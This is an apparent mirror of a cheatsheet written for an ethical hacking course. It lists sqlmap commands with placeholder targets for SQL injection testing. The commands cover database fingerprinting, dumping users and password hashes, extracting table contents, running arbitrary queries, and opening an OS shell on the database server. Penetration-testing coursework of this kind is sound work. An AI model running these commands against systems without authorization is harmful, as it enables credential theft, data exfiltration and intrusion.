mirror of
https://github.com/Erreur32/cheat.git
synced 2024-11-16 08:58:35 +01:00
c8f6b0abb1
Some cheatsheets that I created for a project for CIS4930, Ethical Hacking and Penetration Testing. On request of the professor, I will be sending a pull request with these cheatsheets.
45 lines
1.5 KiB
Text
45 lines
1.5 KiB
Text
# Test URL and POST data and return database banner (if possible)
|
|
./sqlmap.py --url="<url>" --data="<post-data>" --banner
|
|
|
|
# Parse request data and test | request data can be obtained with burp
|
|
./sqlmap.py -r <request-file> <options>
|
|
|
|
# Fingerprint | much more information than banner
|
|
./sqlmap.py -r <request-file> --fingerprint
|
|
|
|
# Get database username, name, and hostname
|
|
./sqlmap.py -r <request-file> --current-user --current-db --hostname
|
|
|
|
# Check if user is a database admin
|
|
./sqlmap.py -r <request-file> --is-dba
|
|
|
|
# Get database users and password hashes
|
|
./sqlmap.py -r <request-file> --users --passwords
|
|
|
|
# Enumerate databases
|
|
./sqlmap.py -r <request-file> --dbs
|
|
|
|
# List tables for one database
|
|
./sqlmap.py -r <request-file> -D <db-name> --tables
|
|
|
|
# Other database commands
|
|
./sqlmap.py -r <request-file> -D <db-name> --columns
|
|
--schema
|
|
--count
|
|
# Enumeration flags
|
|
./sqlmap.py -r <request-file> -D <db-name>
|
|
-T <tbl-name>
|
|
-C <col-name>
|
|
-U <user-name>
|
|
|
|
# Extract data
|
|
./sqlmap.py -r <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump
|
|
|
|
# Execute SQL Query
|
|
./sqlmap.py -r <request-file> --sql-query="<sql-query>"
|
|
|
|
# Append/Prepend SQL Queries
|
|
./sqlmap.py -r <request-file> --prefix="<sql-query>" --suffix="<sql-query>"
|
|
|
|
# Get backdoor access to sql server | can give shell access
|
|
./sqlmap.py -r <request-file> --os-shell
|